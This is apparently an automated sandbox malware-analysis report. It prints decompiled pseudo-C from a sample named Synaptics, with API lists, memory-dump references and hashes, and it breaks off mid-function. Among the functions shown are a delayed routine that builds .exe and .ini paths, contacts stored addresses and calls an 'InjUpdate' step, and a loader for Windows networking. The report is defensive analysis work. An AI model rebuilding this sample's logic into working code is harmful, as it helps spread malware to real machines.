                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x34)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x7c)) = 1;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x88)) = 0;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x9d)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0xb4)) = 1;
                                                                                                                                                                                                                            				_t103 = E0042B3F8(1);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                                                                                                                                                                            				_t53 =  *0x49d93c; // 0x49e030
                                                                                                                                                                                                                            				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                                                                                                                                                                            				E0042B7C8(_t103, _t55);
                                                                                                                                                                                                                            				_t20 = _t90 + 0x98; // 0x736d
                                                                                                                                                                                                                            				_t58 =  *_t20;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
                                                                                                                                                                                                                            				_t60 =  *0x49d93c; // 0x49e030
                                                                                                                                                                                                                            				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                                                                                                                                                                            				OemToCharA( &_v261,  &_v261);
                                                                                                                                                                                                                            				_t67 = E0040E020(0x5c);
                                                                                                                                                                                                                            				if(_t67 != 0) {
                                                                                                                                                                                                                            					_t27 = _t67 + 1; // 0x1
                                                                                                                                                                                                                            					E00409FC4( &_v261, _t27);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t69 = E0040E048( &_v261, 0x2e);
                                                                                                                                                                                                                            				if(_t69 != 0) {
                                                                                                                                                                                                                            					 *_t69 = 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				CharLowerA( &(( &_v261)[1]));
                                                                                                                                                                                                                            				_t31 = _t90 + 0x8c; // 0x45150c
                                                                                                                                                                                                                            				E00404C30(_t31, 0x100,  &_v261);
                                                                                                                                                                                                                            				_t75 =  *0x49d6e4; // 0x49e038
                                                                                                                                                                                                                            				if( *_t75 == 0) {
                                                                                                                                                                                                                            					E004593B4(_t90, _t90, 0x100); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x59)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x5a)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x5b)) = 1;
                                                                                                                                                                                                                            				 *((char*)(_t90 + 0x9e)) = 1;
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                                                                                                                                                                            				E0045B188(_t90, 0x100);
                                                                                                                                                                                                                            				E0045BB4C(_t90);
                                                                                                                                                                                                                            				_t81 = _t90;
                                                                                                                                                                                                                            				if(_v5 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t81);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t90;
                                                                                                                                                                                                                            			}

























                                                                                                                                                                                                                            0x0045924e
                                                                                                                                                                                                                            0x00459257
                                                                                                                                                                                                                            0x0045925f
                                                                                                                                                                                                                            0x00459266
                                                                                                                                                                                                                            0x0045926b
                                                                                                                                                                                                                            0x00459271
                                                                                                                                                                                                                            0x00459273
                                                                                                                                                                                                                            0x00459278
                                                                                                                                                                                                                            0x0045927f
                                                                                                                                                                                                                            0x00459289

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                                                            • OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                                                            • CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                                                            • String ID: 0I$8I$MAINICON
                                                                                                                                                                                                                            • API String ID: 3935243913-3756263232
                                                                                                                                                                                                                            • Opcode ID: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                                                            • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            C-Code - Quality: 26%
                                                                                                                                                                                                                            			E0047B898(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t19;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				intOrPtr _t42;
                                                                                                                                                                                                                            				void* _t51;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				_push(_t51);
                                                                                                                                                                                                                            				_push(0x47b965);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t51 + 0xfffffff0;
                                                                                                                                                                                                                            				if( *0x49c9fc == 0) {
                                                                                                                                                                                                                            					 *0x49c9fc = LoadLibraryA("WS2_32.DLL");
                                                                                                                                                                                                                            					if( *0x49c9fc == 0) {
                                                                                                                                                                                                                            						_push(GetLastError());
                                                                                                                                                                                                                            						_push( &_v8);
                                                                                                                                                                                                                            						_t26 =  *0x49d8e0; // 0x47a5e4
                                                                                                                                                                                                                            						E00406A70(_t26,  &_v12);
                                                                                                                                                                                                                            						_push(_v12);
                                                                                                                                                                                                                            						_v20 = "WS2_32.DLL";
                                                                                                                                                                                                                            						_v16 = 0xb;
                                                                                                                                                                                                                            						_pop(_t30);
                                                                                                                                                                                                                            						E0040A664(_t30, 0,  &_v20);
                                                                                                                                                                                                                            						E0047A93C(__ebx, _v8, 1, __edi, __esi);
                                                                                                                                                                                                                            						E00404378();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t19 =  *0x49c9fc; // 0x75cd0000
                                                                                                                                                                                                                            					 *0x49ee80 = GetProcAddress(_t19, "WSAStartup");
                                                                                                                                                                                                                            					 *0x49ee80(_a4, _a8); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t42);
                                                                                                                                                                                                                            				 *[fs:eax] = _t42;
                                                                                                                                                                                                                            				_push(0x47b96c);
                                                                                                                                                                                                                            				return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8C7
                                                                                                                                                                                                                            • GetLastError.KERNEL32(WS2_32.DLL,00000000,0047B965), ref: 0047B8DA
                                                                                                                                                                                                                              • Part of subcall function 00406A70: LoadStringA.USER32 ref: 00406AA1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(75CD0000,WSAStartup), ref: 0047B92B
                                                                                                                                                                                                                            • WSAStartup.WS2_32(?,?,75CD0000,WSAStartup,WS2_32.DLL,00000000,0047B965), ref: 0047B93E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Load$AddressErrorLastLibraryProcStartupString
                                                                                                                                                                                                                            • String ID: WS2_32.DLL$WS2_32.DLL$WSAStartup
                                                                                                                                                                                                                            • API String ID: 4221839523-1314211545
                                                                                                                                                                                                                            • Opcode ID: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                                                            • Instruction ID: c181d5f6f94ff0715040a16c2373e5647a9c70682208e90bacd88f35eee9369f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6c5734486e13fb394c9afae55c5ff24803e84e5bca5e4d3926a118303e1b0425
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B3218EF1904204AFCB00EFA5C885B9EB7F8E758314F11C97BE618E3291D77859008B99
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 669 434530-43457b 73C9AC50 GetTextMetricsA call 424e24 SelectObject GetTextMetricsA SelectObject 73C9B380 672 43459f-4345a8 669->672 673 43457d-434584 669->673 676 4345aa 672->676 677 4345ac-4345b8 GetSystemMetrics 672->677 674 434586-43458b 673->674 675 43458d 673->675 678 434592-43459d GetSystemMetrics 674->678 675->678 676->677 679 4345ba 677->679 680 4345bd-4345c2 677->680 681 4345c4-4345d7 call 43a75c 678->681 679->680 680->681
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E00434530(struct HDC__* __eax, void* __edx, void* __ebp, void* __eflags) {
                                                                                                                                                                                                                            				struct tagTEXTMETRICA _v112;
                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				char* _t18;
                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                            				signed int _t21;
                                                                                                                                                                                                                            				struct HDC__* _t27;
                                                                                                                                                                                                                            				signed int _t28;
                                                                                                                                                                                                                            				signed int _t30;
                                                                                                                                                                                                                            				signed int _t31;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				struct HDC__* _t38;
                                                                                                                                                                                                                            				struct tagTEXTMETRICA* _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t40 =  &_v112;
                                                                                                                                                                                                                            				_t38 = __eax;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407638();
                                                                                                                                                                                                                            				_t27 = __eax;
                                                                                                                                                                                                                            				GetTextMetricsA(__eax, _t40);
                                                                                                                                                                                                                            				_t14 = SelectObject(_t27, E00424E24( *((intOrPtr*)(_t38 + 0x68)), _t27, _t32));
                                                                                                                                                                                                                            				GetTextMetricsA(_t27,  &(_v112.tmMaxCharWidth)); // executed
                                                                                                                                                                                                                            				SelectObject(_t27, _t14);
                                                                                                                                                                                                                            				_push(_t27);
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				L00407888();
                                                                                                                                                                                                                            				_t18 =  *0x49da40; // 0x49eb1c
                                                                                                                                                                                                                            				if( *_t18 == 0) {
                                                                                                                                                                                                                            					_t28 = _t40->tmHeight;
                                                                                                                                                                                                                            					_t19 = _v112.tmHeight;
                                                                                                                                                                                                                            					if(_t28 > _t19) {
                                                                                                                                                                                                                            						_t28 = _t19;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t21 = GetSystemMetrics(6) << 2;
                                                                                                                                                                                                                            					if(_t28 < 0) {
                                                                                                                                                                                                                            						_t28 = _t28 + 3;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = _t21 + (_t28 >> 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if( *((char*)(_t38 + 0x1a5)) == 0) {
                                                                                                                                                                                                                            						_t31 = 6;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t31 = 8;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t30 = GetSystemMetrics(6) * _t31;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return E0043A75C(_t38, _v112 + _t30);
                                                                                                                                                                                                                            			}

















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9AC50.USER32(00000000), ref: 0043453A
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000), ref: 00434543
                                                                                                                                                                                                                              • Part of subcall function 00424E24: CreateFontIndirectA.GDI32(?), ref: 00424F62
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434552
                                                                                                                                                                                                                            • GetTextMetricsA.GDI32(00000000,?), ref: 0043455F
                                                                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00434566
                                                                                                                                                                                                                            • 73C9B380.USER32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0043456E
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 00434594
                                                                                                                                                                                                                            • GetSystemMetrics.USER32 ref: 004345AE
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Metrics$ObjectSelectSystemText$B380CreateFontIndirect
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3751190600-0
                                                                                                                                                                                                                            • Opcode ID: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                                                            • Instruction ID: 5c0f3d8754ac9f53a552d955726f62212e9f387cfb0fc4aa99143b90913ccd9a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7376c866b0e0f4c459314af59490de973a59b0eadc7fa28dbc4798c05a2bd8b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2111A951F083003BE31066798CC2B6B65C8DB99358F84183AF646D73D2D57CBC41836B
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 58%
                                                                                                                                                                                                                            			E00497CF0(intOrPtr* __ebx, void* __edx, void* __edi, intOrPtr __esi, void* __fp0) {
                                                                                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v21;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				char _v72;
                                                                                                                                                                                                                            				char _v76;
                                                                                                                                                                                                                            				char _v80;
                                                                                                                                                                                                                            				char _v84;
                                                                                                                                                                                                                            				void* _t84;
                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                            				intOrPtr _t92;
                                                                                                                                                                                                                            				void* _t96;
                                                                                                                                                                                                                            				intOrPtr _t100;
                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				char _t113;
                                                                                                                                                                                                                            				intOrPtr _t119;
                                                                                                                                                                                                                            				intOrPtr _t121;
                                                                                                                                                                                                                            				char _t122;
                                                                                                                                                                                                                            				void* _t129;
                                                                                                                                                                                                                            				intOrPtr _t172;
                                                                                                                                                                                                                            				void* _t173;
                                                                                                                                                                                                                            				intOrPtr _t174;
                                                                                                                                                                                                                            				intOrPtr _t176;
                                                                                                                                                                                                                            				intOrPtr _t178;
                                                                                                                                                                                                                            				void* _t185;
                                                                                                                                                                                                                            				char _t192;
                                                                                                                                                                                                                            				void* _t193;
                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                            				intOrPtr _t224;
                                                                                                                                                                                                                            				intOrPtr _t227;
                                                                                                                                                                                                                            				intOrPtr _t231;
                                                                                                                                                                                                                            				intOrPtr _t232;
                                                                                                                                                                                                                            				intOrPtr _t233;
                                                                                                                                                                                                                            				intOrPtr _t234;
                                                                                                                                                                                                                            				intOrPtr _t237;
                                                                                                                                                                                                                            				intOrPtr _t238;
                                                                                                                                                                                                                            				intOrPtr _t239;
                                                                                                                                                                                                                            				intOrPtr _t243;
                                                                                                                                                                                                                            				intOrPtr _t244;
                                                                                                                                                                                                                            				intOrPtr _t249;
                                                                                                                                                                                                                            				intOrPtr _t252;
                                                                                                                                                                                                                            				intOrPtr _t255;
                                                                                                                                                                                                                            				intOrPtr _t258;
                                                                                                                                                                                                                            				intOrPtr _t261;
                                                                                                                                                                                                                            				intOrPtr _t265;
                                                                                                                                                                                                                            				intOrPtr _t273;
                                                                                                                                                                                                                            				intOrPtr _t274;
                                                                                                                                                                                                                            				void* _t281;
                                                                                                                                                                                                                            				void* _t291;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t291 = __fp0;
                                                                                                                                                                                                                            				_t267 = __esi;
                                                                                                                                                                                                                            				_t266 = __edi;
                                                                                                                                                                                                                            				_t191 = __ebx;
                                                                                                                                                                                                                            				_t273 = _t274;
                                                                                                                                                                                                                            				_t193 = 0xa;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t193 = _t193 - 1;
                                                                                                                                                                                                                            				} while (_t193 != 0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                            				_push(_t273);
                                                                                                                                                                                                                            				_push(0x49814b);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t274;
                                                                                                                                                                                                                            				Sleep(0xea60); // executed
                                                                                                                                                                                                                            				E004737B0( &_v28);
                                                                                                                                                                                                                            				_push(_v28);
                                                                                                                                                                                                                            				_push(0x498164);
                                                                                                                                                                                                                            				E00472D44(9, __ebx, _t193,  &_v32, __esi); // executed
                                                                                                                                                                                                                            				_push(_v32);
                                                                                                                                                                                                                            				_push(".exe");
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				E004737B0( &_v36);
                                                                                                                                                                                                                            				_push(_v36);
                                                                                                                                                                                                                            				_push(0x498164);
                                                                                                                                                                                                                            				E00472D44(7, __ebx, _t193,  &_v40, __esi);
                                                                                                                                                                                                                            				_push(_v40);
                                                                                                                                                                                                                            				_push(".ini");
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				_v21 = 0;
                                                                                                                                                                                                                            				if(E00474D34(_t193) == 0) {
                                                                                                                                                                                                                            					L44:
                                                                                                                                                                                                                            					_pop(_t224);
                                                                                                                                                                                                                            					 *[fs:eax] = _t224;
                                                                                                                                                                                                                            					_push(E00498152);
                                                                                                                                                                                                                            					E004049E4( &_v84, 0xf);
                                                                                                                                                                                                                            					E004049C0( &_v20);
                                                                                                                                                                                                                            					return E004049E4( &_v12, 2);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_v16 = 1;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t84 = _v16 - 1;
                                                                                                                                                                                                                            						if(_t84 == 0) {
                                                                                                                                                                                                                            							_t227 =  *0x49f174; // 0x21e3020
                                                                                                                                                                                                                            							E00404A58( &_v20, _t227);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t185 = _t84 - 1;
                                                                                                                                                                                                                            							if(_t185 == 0) {
                                                                                                                                                                                                                            								_t232 =  *0x49f174; // 0x21e3020
                                                                                                                                                                                                                            								E00404A58( &_v20, _t232);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_t185 == 1) {
                                                                                                                                                                                                                            									_t233 =  *0x49f174; // 0x21e3020
                                                                                                                                                                                                                            									E00404A58( &_v20, _t233);
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_push(_t273);
                                                                                                                                                                                                                            						_push(0x497f86);
                                                                                                                                                                                                                            						_push( *[fs:eax]);
                                                                                                                                                                                                                            						 *[fs:eax] = _t274;
                                                                                                                                                                                                                            						_t88 =  *0x49f13c; // 0x21e2354
                                                                                                                                                                                                                            						E004967D4(_t88, _t191, 0x498190);
                                                                                                                                                                                                                            						_t91 = E00474D50(_v20, _t191, _v8, _t267); // executed
                                                                                                                                                                                                                            						_t280 = _t91;
                                                                                                                                                                                                                            						if(_t91 != 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t92 =  *0x49f13c; // 0x21e2354
                                                                                                                                                                                                                            						E004967D4(_t92, _t191, 0x4981ec);
                                                                                                                                                                                                                            						_pop(_t231);
                                                                                                                                                                                                                            						 *[fs:eax] = _t231;
                                                                                                                                                                                                                            						_v16 = _v16 + 1;
                                                                                                                                                                                                                            						__eflags = _v16 - 4;
                                                                                                                                                                                                                            						if(_v16 != 4) {
                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L18:
                                                                                                                                                                                                                            							if(_v21 == 0) {
                                                                                                                                                                                                                            								goto L44;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_v16 = 1;
                                                                                                                                                                                                                            							while(1) {
                                                                                                                                                                                                                            								_t96 = _v16 - 1;
                                                                                                                                                                                                                            								if(_t96 == 0) {
                                                                                                                                                                                                                            									_t234 =  *0x49f168; // 0x21e30f4
                                                                                                                                                                                                                            									E00404A58( &_v20, _t234);
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t129 = _t96 - 1;
                                                                                                                                                                                                                            									if(_t129 == 0) {
                                                                                                                                                                                                                            										_t238 =  *0x49f16c; // 0x21e314c
                                                                                                                                                                                                                            										E00404A58( &_v20, _t238);
                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                            										if(_t129 == 1) {
                                                                                                                                                                                                                            											_t239 =  *0x49f170; // 0x21e3198
                                                                                                                                                                                                                            											E00404A58( &_v20, _t239);
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_push(_t273);
                                                                                                                                                                                                                            								_push(0x498104);
                                                                                                                                                                                                                            								_push( *[fs:eax]);
                                                                                                                                                                                                                            								 *[fs:eax] = _t274;
                                                                                                                                                                                                                            								_t100 =  *0x49f13c; // 0x21e2354
                                                                                                                                                                                                                            								E004967D4(_t100, _t191, 0x49820c);
                                                                                                                                                                                                                            								if(E00474D50(_v20, _t191, _v12, _t267) != 0) {
                                                                                                                                                                                                                            									break;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_pop(_t237);
                                                                                                                                                                                                                            								_pop(_t210);
                                                                                                                                                                                                                            								 *[fs:eax] = _t237;
                                                                                                                                                                                                                            								_v16 = _v16 + 1;
                                                                                                                                                                                                                            								__eflags = _v16 - 4;
                                                                                                                                                                                                                            								if(_v16 != 4) {
                                                                                                                                                                                                                            									continue;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L44;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t105 =  *0x49f13c; // 0x21e2354
                                                                                                                                                                                                                            							E0049A3E0(_t105, _t191, 0, _t266, _t267, _t291);
                                                                                                                                                                                                                            							if( *0x49f148 == 0) {
                                                                                                                                                                                                                            								__eflags =  *0x49f149;
                                                                                                                                                                                                                            								if(__eflags == 0) {
                                                                                                                                                                                                                            									_t192 = 0;
                                                                                                                                                                                                                            									__eflags = 0;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									_t192 = 1;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t192 = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_push(_t273);
                                                                                                                                                                                                                            							_push(0x4980e6);
                                                                                                                                                                                                                            							_push( *[fs:eax]);
                                                                                                                                                                                                                            							 *[fs:eax] = _t274;
                                                                                                                                                                                                                            							E00472EF0( &_v84, _t192, _t210, 0);
                                                                                                                                                                                                                            							E00404DCC(_v84, 0x498230);
                                                                                                                                                                                                                            							if(0 == 0) {
                                                                                                                                                                                                                            								_t112 =  *0x49f1dc; // 0x80356
                                                                                                                                                                                                                            								_t113 = E00473490(_t112, _t192, "InjUpdate", _v12, __eflags, 0, 0);
                                                                                                                                                                                                                            								__eflags = _t113;
                                                                                                                                                                                                                            								if(_t113 != 0) {
                                                                                                                                                                                                                            									E0045A800();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								_t119 =  *0x49f1dc; // 0x80356
                                                                                                                                                                                                                            								if(E00473490(_t119, _t192, "InjUpdate", _v12, 0, 0, _t192) == 0) {
                                                                                                                                                                                                                            									_t121 =  *0x49f1dc; // 0x80356
                                                                                                                                                                                                                            									_t122 = E00473490(_t121, _t192, "InjUpdate", _v12, __eflags, 0, 0);
                                                                                                                                                                                                                            									__eflags = _t122;
                                                                                                                                                                                                                            									if(_t122 != 0) {
                                                                                                                                                                                                                            										E0045A800();
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									E0045A800();
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_pop(_t243);
                                                                                                                                                                                                                            							 *[fs:eax] = _t243;
                                                                                                                                                                                                                            							_pop(_t244);
                                                                                                                                                                                                                            							 *[fs:eax] = _t244;
                                                                                                                                                                                                                            							goto L44;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t191 = E00430158(_v8, 1);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v48, 0);
                                                                                                                                                                                                                            					_t249 =  *0x49f1c8; // 0x21e0774
                                                                                                                                                                                                                            					E004758E8(_v48, _t191,  &_v44, _t249);
                                                                                                                                                                                                                            					E00404A14(0x49f1c8, _v44);
                                                                                                                                                                                                                            					 *((intOrPtr*)( *_t191))( &_v56, 0);
                                                                                                                                                                                                                            					_t252 =  *0x49f15c; // 0x21e2fec
